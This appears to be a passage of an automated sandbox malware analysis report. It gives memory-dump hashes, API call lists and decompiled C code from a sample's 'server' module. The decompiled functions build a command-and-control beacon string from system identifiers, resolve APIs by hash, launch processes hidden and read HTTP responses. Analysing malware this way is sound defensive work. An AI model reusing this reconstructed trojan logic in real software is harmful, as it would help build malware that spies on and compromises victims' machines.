                • Instruction ID: 57275b4ae29193f91000f662cbf3fd0c8488a2fab8c317b692722d809040ffb9
                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction Fuzzy Hash: FA21FB32910215AFCB10DFA8C8C09ABBBA5FF45350B468158E915DF249E731F919CBF1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.517545518.0000000000716000.00000040.00000020.00020000.00000000.sdmp, Offset: 00716000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_716000_server.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction ID: a736bd7200e9029a8b18bd11bff088e9efcba74091d5cbad8fc51baf2039ce68
                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction Fuzzy Hash: 3A118E72341200AFD744DF59DC86FE673EAEB88320B298165ED08CB352E679EC45C761
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                • Instruction ID: cb338683bbbbb770a5ec9f26ce2a43e2f4ac44bafd8af397dcfe8ba9a35ecf79
                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                • Instruction Fuzzy Hash: B401A277A006048FDF21DF64C805BAF37E9FB86316F4544A5D90AA72C2E774A9818B90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E02222B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
                				intOrPtr _v4;
                				signed int _v8;
                				int* _v12;
                				char* _v16;
                				intOrPtr _v20;
                				void* _v24;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				void* _v40;
                				void* __ebx;
                				void* __edi;
                				long _t68;
                				intOrPtr _t69;
                				intOrPtr _t70;
                				intOrPtr _t71;
                				intOrPtr _t72;
                				intOrPtr _t73;
                				void* _t76;
                				intOrPtr _t77;
                				int _t80;
                				intOrPtr _t81;
                				intOrPtr _t85;
                				intOrPtr _t86;
                				intOrPtr _t87;
                				void* _t89;
                				void* _t92;
                				intOrPtr _t96;
                				intOrPtr _t100;
                				intOrPtr* _t102;
                				int* _t108;
                				int* _t118;
                				char** _t120;
                				char* _t121;
                				intOrPtr* _t126;
                				intOrPtr* _t128;
                				intOrPtr* _t130;
                				intOrPtr* _t132;
                				intOrPtr _t135;
                				intOrPtr _t139;
                				int _t142;
                				intOrPtr _t144;
                				int _t147;
                				intOrPtr _t148;
                				int _t151;
                				void* _t152;
                				intOrPtr _t166;
                				void* _t168;
                				int _t169;
                				void* _t170;
                				void* _t171;
                				long _t172;
                				intOrPtr* _t173;
                				intOrPtr* _t174;
                				intOrPtr _t175;
                				intOrPtr* _t178;
                				char** _t181;
                				char** _t183;
                				char** _t184;
                				void* _t189;
                
                				_t68 = __eax;
                				_t181 =  &_v16;
                				_t152 = _a20;
                				_a20 = 8;
                				if(__eax == 0) {
                					_t68 = GetTickCount();
                				}
                				_t69 =  *0x222a018; // 0x258be91c
                				asm("bswap eax");
                				_t70 =  *0x222a014; // 0x3a87c8cd
                				asm("bswap eax");
                				_t71 =  *0x222a010; // 0xd8d2f808
                				asm("bswap eax");
                				_t72 = E0222A00C; // 0xeec43f25
                				asm("bswap eax");
                				_t73 =  *0x222a348; // 0x9ad5a8
                				_t3 = _t73 + 0x222b5ac; // 0x74666f73
                				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x222a02c,  *0x222a004, _t68);
                				_t76 = E0222467F();
                				_t77 =  *0x222a348; // 0x9ad5a8
                				_t4 = _t77 + 0x222b575; // 0x74707526
                				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
                				_t183 =  &(_t181[0xe]);
                				_t170 = _t169 + _t80;
                				if(_a24 != 0) {
                					_t148 =  *0x222a348; // 0x9ad5a8
                					_t8 = _t148 + 0x222b508; // 0x732526
                					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
                					_t183 =  &(_t183[3]);
                					_t170 = _t170 + _t151;
                				}
                				_t81 =  *0x222a348; // 0x9ad5a8
                				_t10 = _t81 + 0x222b89e; // 0x2bd8e46
                				_t153 = _t10;
                				_t189 = _a20 - _t10;
                				_t12 = _t81 + 0x222b246; // 0x74636126
                				_t164 = 0 | _t189 == 0x00000000;
                				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
                				_t85 =  *0x222a36c; // 0x2bd95b0
                				_t184 =  &(_t183[3]);
                				if(_t85 != 0) {
                					_t144 =  *0x222a348; // 0x9ad5a8
                					_t16 = _t144 + 0x222b8be; // 0x3d736f26
                					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
                					_t184 =  &(_t184[3]);
                					_t171 = _t171 + _t147;
                				}
                				_t86 = E0222472F(_t153);
                				_a32 = _t86;
                				if(_t86 != 0) {
                					_t139 =  *0x222a348; // 0x9ad5a8
                					_t19 = _t139 + 0x222b8d0; // 0x736e6426
                					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
                					_t184 =  &(_t184[3]);
                					_t171 = _t171 + _t142;
                					HeapFree( *0x222a2d8, 0, _a40);
                				}
                				_t87 = E02221340();
                				_a32 = _t87;
                				if(_t87 != 0) {
                					_t135 =  *0x222a348; // 0x9ad5a8
                					_t23 = _t135 + 0x222b8c5; // 0x6f687726
                					wsprintfA(_t171 + _t152, _t23, _t87);
                					_t184 =  &(_t184[3]);
                					HeapFree( *0x222a2d8, 0, _a40);
                				}
                				_t166 =  *0x222a3cc; // 0x2bd9600
                				_t89 = E02226B59(0x222a00a, _t166 + 4);
                				_t172 = 0;
                				_a16 = _t89;
                				if(_t89 == 0) {
                					L30:
                					HeapFree( *0x222a2d8, _t172, _t152);
                					return _a44;
                				} else {
                					_t92 = RtlAllocateHeap( *0x222a2d8, 0, 0x800);
                					_a24 = _t92;
                					if(_t92 == 0) {
                						L29:
                						HeapFree( *0x222a2d8, _t172, _a8);
                						goto L30;
                					}
                					E02222915(GetTickCount());
                					_t96 =  *0x222a3cc; // 0x2bd9600
                					__imp__(_t96 + 0x40);
                					asm("lock xadd [eax], ecx");
                					_t100 =  *0x222a3cc; // 0x2bd9600
                					__imp__(_t100 + 0x40);
                					_t102 =  *0x222a3cc; // 0x2bd9600
                					_t168 = E02226675(1, _t164, _t152,  *_t102);
                					asm("lock xadd [eax], ecx");
                					if(_t168 == 0) {
                						L28:
                						HeapFree( *0x222a2d8, _t172, _a16);
                						goto L29;
                					}
                					StrTrimA(_t168, 0x2229280);
                					_push(_t168);
                					_t108 = E02227563();
                					_v12 = _t108;
                					if(_t108 == 0) {
                						L27:
                						HeapFree( *0x222a2d8, _t172, _t168);
                						goto L28;
                					}
                					_t173 = __imp__;
                					 *_t173(_t168, _a8);
                					 *_t173(_a4, _v12);
                					_t174 = __imp__;
                					 *_t174(_v4, _v24);
                					_t175 = E02226536( *_t174(_v12, _t168), _v20);
                					_v36 = _t175;
                					if(_t175 == 0) {
                						_v8 = 8;
                						L25:
                						E022263F6();
                						L26:
                						HeapFree( *0x222a2d8, 0, _v40);
                						_t172 = 0;
                						goto L27;
                					}
                					_t118 = E02226F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
                					_v12 = _t118;
                					if(_t118 == 0) {
                						_t178 = _v24;
                						_v20 = E0222597D(_t178, _t175, _v16, _v12);
                						_t126 =  *((intOrPtr*)(_t178 + 8));
                						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
                						_t128 =  *((intOrPtr*)(_t178 + 8));
                						 *((intOrPtr*)( *_t128 + 8))(_t128);
                						_t130 =  *((intOrPtr*)(_t178 + 4));
                						 *((intOrPtr*)( *_t130 + 8))(_t130);
                						_t132 =  *_t178;
                						 *((intOrPtr*)( *_t132 + 8))(_t132);
                						E022261DA(_t178);
                					}
                					if(_v8 != 0x10d2) {
                						L20:
                						if(_v8 == 0) {
                							_t120 = _v16;
                							if(_t120 != 0) {
                								_t121 =  *_t120;
                								_t176 =  *_v12;
                								_v16 = _t121;
                								wcstombs(_t121, _t121,  *_v12);
                								 *_v24 = E0222673A(_v16, _v16, _t176 >> 1);
                							}
                						}
                						goto L23;
                					} else {
                						if(_v16 != 0) {
                							L23:
                							E022261DA(_v32);
                							if(_v12 == 0 || _v8 == 0x10d2) {
                								goto L26;
                							} else {
                								goto L25;
                							}
                						}
                						_v8 = _v8 & 0x00000000;
                						goto L20;
                					}
                				}
                			}






























































                0x02222b91
                0x02222b91
                0x02222b95
                0x02222b9c
                0x02222ba6
                0x02222ba8
                0x02222ba8
                0x02222bb5
                0x02222bc0
                0x02222bc3
                0x02222bce
                0x02222bd1
                0x02222bd6
                0x02222bd9
                0x02222bde
                0x02222be1
                0x02222bed
                0x02222bfa
                0x02222bfc
                0x02222c02
                0x02222c07
                0x02222c12
                0x02222c14
                0x02222c17
                0x02222c1e
                0x02222c20
                0x02222c29
                0x02222c34
                0x02222c36
                0x02222c39
                0x02222c39
                0x02222c3b
                0x02222c40
                0x02222c40
                0x02222c48
                0x02222c4c
                0x02222c52
                0x02222c5d
                0x02222c5f
                0x02222c64
                0x02222c69
                0x02222c6c
                0x02222c71
                0x02222c7c
                0x02222c7e
                0x02222c81
                0x02222c81
                0x02222c83
                0x02222c8e
                0x02222c94
                0x02222c97
                0x02222c9c
                0x02222ca7
                0x02222ca9
                0x02222cb0
                0x02222cba
                0x02222cba
                0x02222cbc
                0x02222cc1
                0x02222cc7
                0x02222cca
                0x02222ccf
                0x02222cd9
                0x02222cdb
                0x02222cea
                0x02222cea
                0x02222cec
                0x02222cfa
                0x02222cff
                0x02222d01
                0x02222d07
                0x02222ee7
                0x02222eef
                0x02222efc
                0x02222d0d
                0x02222d19
                0x02222d1f
                0x02222d25
                0x02222eda
                0x02222ee5
                0x00000000
                0x02222ee5
                0x02222d31
                0x02222d36
                0x02222d3f
                0x02222d50
                0x02222d54
                0x02222d5d
                0x02222d63
                0x02222d70
                0x02222d7d
                0x02222d83
                0x02222ecd
                0x02222ed8
                0x00000000
                0x02222ed8
                0x02222d8f
                0x02222d95
                0x02222d96
                0x02222d9b
                0x02222da1
                0x02222ec3
                0x02222ecb
                0x00000000
                0x02222ecb
                0x02222dab
                0x02222db2
                0x02222dbc
                0x02222dc2
                0x02222dcc
                0x02222dde
                0x02222de0
                0x02222de6
                0x02222eff
                0x02222eae
                0x02222eae
                0x02222eb3
                0x02222ebf
                0x02222ec1
                0x00000000
                0x02222ec1
                0x02222df1
                0x02222df6
                0x02222dfc
                0x02222e07
                0x02222e12
                0x02222e16
                0x02222e1c
                0x02222e22
                0x02222e28
                0x02222e2b
                0x02222e31
                0x02222e34
                0x02222e39
                0x02222e3d
                0x02222e3d
                0x02222e4a
                0x02222e58
                0x02222e5d
                0x02222e5f
                0x02222e65
                0x02222e6b
                0x02222e6d
                0x02222e72
                0x02222e76
                0x02222e92
                0x02222e92
                0x02222e65
                0x00000000
                0x02222e4c
                0x02222e51
                0x02222e94
                0x02222e98
                0x02222ea2
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x02222ea2
                0x02222e53
                0x00000000
                0x02222e53
                0x02222e4a

                APIs
                • GetTickCount.KERNEL32 ref: 02222BA8
                • wsprintfA.USER32 ref: 02222BF5
                • wsprintfA.USER32 ref: 02222C12
                • wsprintfA.USER32 ref: 02222C34
                • wsprintfA.USER32 ref: 02222C5B
                • wsprintfA.USER32 ref: 02222C7C
                • wsprintfA.USER32 ref: 02222CA7
                • HeapFree.KERNEL32(00000000,?), ref: 02222CBA
                • wsprintfA.USER32 ref: 02222CD9
                • HeapFree.KERNEL32(00000000,?), ref: 02222CEA
                  • Part of subcall function 02226B59: RtlEnterCriticalSection.NTDLL(02BD95C0), ref: 02226B75
                  • Part of subcall function 02226B59: RtlLeaveCriticalSection.NTDLL(02BD95C0), ref: 02226B93
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02222D19
                • GetTickCount.KERNEL32 ref: 02222D2B
                • RtlEnterCriticalSection.NTDLL(02BD95C0), ref: 02222D3F
                • RtlLeaveCriticalSection.NTDLL(02BD95C0), ref: 02222D5D
                  • Part of subcall function 02226675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266A0
                  • Part of subcall function 02226675: lstrlen.KERNEL32(00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266A8
                  • Part of subcall function 02226675: strcpy.NTDLL ref: 022266BF
                  • Part of subcall function 02226675: lstrcat.KERNEL32(00000000,00000000), ref: 022266CA
                  • Part of subcall function 02226675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02223ECE,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266E7
                • StrTrimA.SHLWAPI(00000000,02229280,?,02BD9600), ref: 02222D8F
                  • Part of subcall function 02227563: lstrlen.KERNEL32(02BD9C10,00000000,00000000,00000000,02223EF9,00000000), ref: 02227573
                  • Part of subcall function 02227563: lstrlen.KERNEL32(?), ref: 0222757B
                  • Part of subcall function 02227563: lstrcpy.KERNEL32(00000000,02BD9C10), ref: 0222758F
                  • Part of subcall function 02227563: lstrcat.KERNEL32(00000000,?), ref: 0222759A
                • lstrcpy.KERNEL32(00000000,?), ref: 02222DB2
                • lstrcpy.KERNEL32(?,?), ref: 02222DBC
                • lstrcat.KERNEL32(?,?), ref: 02222DCC
                • lstrcat.KERNEL32(?,00000000), ref: 02222DD3
                  • Part of subcall function 02226536: lstrlen.KERNEL32(?,00000000,02BD9E18,00000000,02226F0A,02BDA03B,43175AC3,?,?,?,?,43175AC3,00000005,0222A00C,4D283A53,?), ref: 0222653D
                  • Part of subcall function 02226536: mbstowcs.NTDLL ref: 02226566
                  • Part of subcall function 02226536: memset.NTDLL ref: 02226578
                • wcstombs.NTDLL ref: 02222E76
                  • Part of subcall function 0222597D: SysAllocString.OLEAUT32(?), ref: 022259B8
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                • HeapFree.KERNEL32(00000000,?), ref: 02222EBF
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02222ECB
                • HeapFree.KERNEL32(00000000,?,?,02BD9600), ref: 02222ED8
                • HeapFree.KERNEL32(00000000,?), ref: 02222EE5
                • HeapFree.KERNEL32(00000000,?), ref: 02222EEF
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
                • String ID:
                • API String ID: 1185349883-0
                • Opcode ID: e214c7db420c6baada295f496f99ef66ea3461b44d0b2e250a6b6f8e28911376
                • Instruction ID: d5ae22a1b72dd978328f527395c441b64a913340a5222048aeccced3f5725ae3
                • Opcode Fuzzy Hash: e214c7db420c6baada295f496f99ef66ea3461b44d0b2e250a6b6f8e28911376
                • Instruction Fuzzy Hash: 8FA18A71900325BFC721AFA4EC48E5A7BE9EF48714F161A28F848D7220D733E969DB51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E02227238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				char _v20;
                				intOrPtr _v24;
                				signed int _v28;
                				intOrPtr _v32;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t58;
                				signed int _t60;
                				signed int _t62;
                				intOrPtr _t64;
                				intOrPtr _t66;
                				intOrPtr _t70;
                				void* _t72;
                				void* _t75;
                				void* _t76;
                				intOrPtr _t80;
                				WCHAR* _t83;
                				void* _t84;
                				void* _t85;
                				void* _t86;
                				intOrPtr _t92;
                				intOrPtr* _t102;
                				signed int _t103;
                				void* _t104;
                				intOrPtr _t105;
                				void* _t107;
                				intOrPtr* _t115;
                				void* _t119;
                				intOrPtr _t125;
                
                				_t58 =  *0x222a3dc; // 0x2bd9cc0
                				_v24 = _t58;
                				_v28 = 8;
                				_v20 = GetTickCount();
                				_t60 = E02226ABD();
                				_t103 = 5;
                				_t98 = _t60 % _t103 + 6;
                				_t62 = E02226ABD();
                				_t117 = _t62 % _t103 + 6;
                				_v32 = _t62 % _t103 + 6;
                				_t64 = E022242E9(_t60 % _t103 + 6);
                				_v16 = _t64;
                				if(_t64 != 0) {
                					_t66 = E022242E9(_t117);
                					_v12 = _t66;
                					if(_t66 != 0) {
                						_push(5);
                						_t104 = 0xa;
                						_t119 = E0222398D(_t104,  &_v20);
                						if(_t119 == 0) {
                							_t119 = 0x222918c;
                						}
                						_t70 = E02225FA1(_v24);
                						_v8 = _t70;
                						if(_t70 != 0) {
                							_t115 = __imp__;
                							_t72 =  *_t115(_t119);
                							_t75 =  *_t115(_v8);
                							_t76 =  *_t115(_a4);
                							_t80 = E022233DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                							_v24 = _t80;
                							if(_t80 != 0) {
                								_t105 =  *0x222a348; // 0x9ad5a8
                								_t102 =  *0x222a138; // 0x2227ddd
                								_t28 = _t105 + 0x222bd10; // 0x530025
                								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                								_push(4);
                								_t107 = 5;
                								_t83 = E0222398D(_t107,  &_v20);
                								_a8 = _t83;
                								if(_t83 == 0) {
                									_a8 = 0x2229190;
                								}
                								_t84 =  *_t115(_a8);
                								_t85 =  *_t115(_v8);
                								_t86 =  *_t115(_a4);
                								_t125 = E022233DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                								if(_t125 == 0) {
                									E022261DA(_v24);
                								} else {
                									_t92 =  *0x222a348; // 0x9ad5a8
                									_t44 = _t92 + 0x222ba20; // 0x73006d
                									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                									 *_a16 = _v24;
                									_v28 = _v28 & 0x00000000;
                									 *_a20 = _t125;
                								}
                							}
                							E022261DA(_v8);
                						}
                						E022261DA(_v12);
                					}
                					E022261DA(_v16);
                				}
                				return _v28;
                			}



































                0x0222723e
                0x02227246
                0x02227249
                0x02227256
                0x02227259
                0x02227260
                0x02227267
                0x0222726a
                0x02227277
                0x0222727a
                0x0222727d
                0x02227282
                0x02227287
                0x0222728f
                0x02227294
                0x02227299
                0x0222729f
                0x022272a3
                0x022272ac
                0x022272b0
                0x022272b2
                0x022272b2
                0x022272ba
                0x022272bf
                0x022272c4
                0x022272ca
                0x022272d1
                0x022272e2
                0x022272e9
                0x022272fb
                0x02227300
                0x02227305
                0x0222730e
                0x02227317
                0x02227320
                0x02227336
                0x0222733b
                0x0222733f
                0x02227343
                0x02227348
                0x0222734d
                0x0222734f
                0x0222734f
                0x02227359
                0x02227362
                0x02227369
                0x02227385
                0x02227389
                0x022273c2
                0x0222738b
                0x0222738e
                0x02227396
                0x022273a7
                0x022273af
                0x022273b7
                0x022273bb
                0x022273bb
                0x02227389
                0x022273ca
                0x022273ca
                0x022273d2
                0x022273d2
                0x022273da
                0x022273da
                0x022273e6

                APIs
                • GetTickCount.KERNEL32 ref: 02227250
                • lstrlen.KERNEL32(00000000,00000005), ref: 022272D1
                • lstrlen.KERNEL32(?), ref: 022272E2
                • lstrlen.KERNEL32(00000000), ref: 022272E9
                • lstrlenW.KERNEL32(80000002), ref: 022272F0
                • lstrlen.KERNEL32(?,00000004), ref: 02227359
                • lstrlen.KERNEL32(?), ref: 02227362
                • lstrlen.KERNEL32(?), ref: 02227369
                • lstrlenW.KERNEL32(?), ref: 02227370
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: lstrlen$CountFreeHeapTick
                • String ID:
                • API String ID: 2535036572-0
                • Opcode ID: 399f9467768f92e17e2cec9b625e341d60a4f7aed640a4b5709857b7d33881cc
                • Instruction ID: beb96e3641cf5e7ed6d872bc08ead0f6e9d9be85793014383395cd8ca6da54ac
                • Opcode Fuzzy Hash: 399f9467768f92e17e2cec9b625e341d60a4f7aed640a4b5709857b7d33881cc
                • Instruction Fuzzy Hash: 95518E32D1022ABBCF11AFE5DC44A9E7BB6EF44314F154065F904AB260DB36DA29DF90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E022237DF(void* __eax, void* __ecx) {
                				long _v8;
                				char _v12;
                				void* _v16;
                				void* _v28;
                				long _v32;
                				void _v104;
                				char _v108;
                				long _t36;
                				intOrPtr _t40;
                				intOrPtr _t47;
                				intOrPtr _t50;
                				void* _t58;
                				void* _t68;
                				intOrPtr* _t70;
                				intOrPtr* _t71;
                
                				_t1 = __eax + 0x14; // 0x74183966
                				_t69 =  *_t1;
                				_t36 = E02226BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                				_v8 = _t36;
                				if(_t36 != 0) {
                					L12:
                					return _v8;
                				}
                				E02227AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                				_t40 = _v12(_v12);
                				_v8 = _t40;
                				if(_t40 == 0 && ( *0x222a300 & 0x00000001) != 0) {
                					_v32 = 0;
                					asm("stosd");
                					asm("stosd");
                					asm("stosd");
                					_v108 = 0;
                					memset( &_v104, 0, 0x40);
                					_t47 =  *0x222a348; // 0x9ad5a8
                					_t18 = _t47 + 0x222b706; // 0x73797325
                					_t68 = E0222127E(_t18);
                					if(_t68 == 0) {
                						_v8 = 8;
                					} else {
                						_t50 =  *0x222a348; // 0x9ad5a8
                						_t19 = _t50 + 0x222b86c; // 0x2bd8e14
                						_t20 = _t50 + 0x222b3f6; // 0x4e52454b
                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                						if(_t71 == 0) {
                							_v8 = 0x7f;
                						} else {
                							_v108 = 0x44;
                							E02225B56();
                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                							_push(1);
                							E02225B56();
                							if(_t58 == 0) {
                								_v8 = GetLastError();
                							} else {
                								CloseHandle(_v28);
                								CloseHandle(_v32);
                							}
                						}
                						HeapFree( *0x222a2d8, 0, _t68);
                					}
                				}
                				_t70 = _v16;
                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                				E022261DA(_t70);
                				goto L12;
                			}


















                0x022237e7
                0x022237e7
                0x022237f6
                0x022237fd
                0x02223802
                0x0222390f
                0x02223916
                0x02223916
                0x02223811
                0x02223819
                0x0222381c
                0x02223821
                0x02223836
                0x0222383c
                0x0222383d
                0x02223840
                0x02223846
                0x02223849
                0x0222384e
                0x02223856
                0x02223862
                0x02223866
                0x022238f6
                0x0222386c
                0x0222386c
                0x02223871
                0x02223878
                0x0222388c
                0x02223890
                0x022238df
                0x02223892
                0x02223893
                0x0222389a
                0x022238b3
                0x022238b5
                0x022238b9
                0x022238c0
                0x022238da
                0x022238c2
                0x022238cb
                0x022238d0
                0x022238d0
                0x022238c0
                0x022238ee
                0x022238ee
                0x02223866
                0x022238fd
                0x02223906
                0x0222390a
                0x00000000

                APIs
                  • Part of subcall function 02226BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,022237FB,?,?,?,?,00000000,00000000), ref: 02226C1E
                  • Part of subcall function 02226BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02226C40
                  • Part of subcall function 02226BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02226C56
                  • Part of subcall function 02226BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02226C6C
                  • Part of subcall function 02226BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02226C82
                  • Part of subcall function 02226BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02226C98
                • memset.NTDLL ref: 02223849
                  • Part of subcall function 0222127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02223862,73797325), ref: 0222128F
                  • Part of subcall function 0222127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 022212A9
                • GetModuleHandleA.KERNEL32(4E52454B,02BD8E14,73797325), ref: 0222387F
                • GetProcAddress.KERNEL32(00000000), ref: 02223886
                • HeapFree.KERNEL32(00000000,00000000), ref: 022238EE
                  • Part of subcall function 02225B56: GetProcAddress.KERNEL32(36776F57,02222425), ref: 02225B71
                • CloseHandle.KERNEL32(00000000,00000001), ref: 022238CB
                • CloseHandle.KERNEL32(?), ref: 022238D0
                • GetLastError.KERNEL32(00000001), ref: 022238D4
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                • String ID:
                • API String ID: 3075724336-0
                • Opcode ID: 363d63f9a89187aac0638a80daa290da57932f2b26658c8c80be47a2001fe442
                • Instruction ID: ad6c808bbee5ad945331b9cfa982a0836998dce8a0d48cf7b930ec8c4a8a064c
                • Opcode Fuzzy Hash: 363d63f9a89187aac0638a80daa290da57932f2b26658c8c80be47a2001fe442
                • Instruction Fuzzy Hash: 1C3150B2D10229BFDB20EFE4DC88E9EBBBCEB08304F514465E605A7114D7369A5CCB51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02223FA5(void* __ecx, void* __esi) {
                				long _v8;
                				long _v12;
                				long _v16;
                				long _v20;
                				long _t34;
                				long _t39;
                				long _t42;
                				long _t56;
                				void* _t58;
                				void* _t59;
                				void* _t61;
                
                				_t61 = __esi;
                				_t59 = __ecx;
                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                				do {
                					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                					_v20 = _t34;
                					if(_t34 != 0) {
                						L3:
                						_v8 = 4;
                						_v16 = 0;
                						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                							_t39 = GetLastError();
                							_v12 = _t39;
                							if(_v20 == 0 || _t39 != 0x2ef3) {
                								L15:
                								return _v12;
                							} else {
                								goto L11;
                							}
                						}
                						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                							goto L11;
                						} else {
                							_v16 = 0;
                							_v8 = 0;
                							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                							_t58 = E022233DC(_v8 + 1);
                							if(_t58 == 0) {
                								_v12 = 8;
                							} else {
                								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                									E022261DA(_t58);
                									_v12 = GetLastError();
                								} else {
                									 *((char*)(_t58 + _v8)) = 0;
                									 *(_t61 + 0xc) = _t58;
                								}
                							}
                							goto L15;
                						}
                					}
                					SetEvent( *(_t61 + 0x1c));
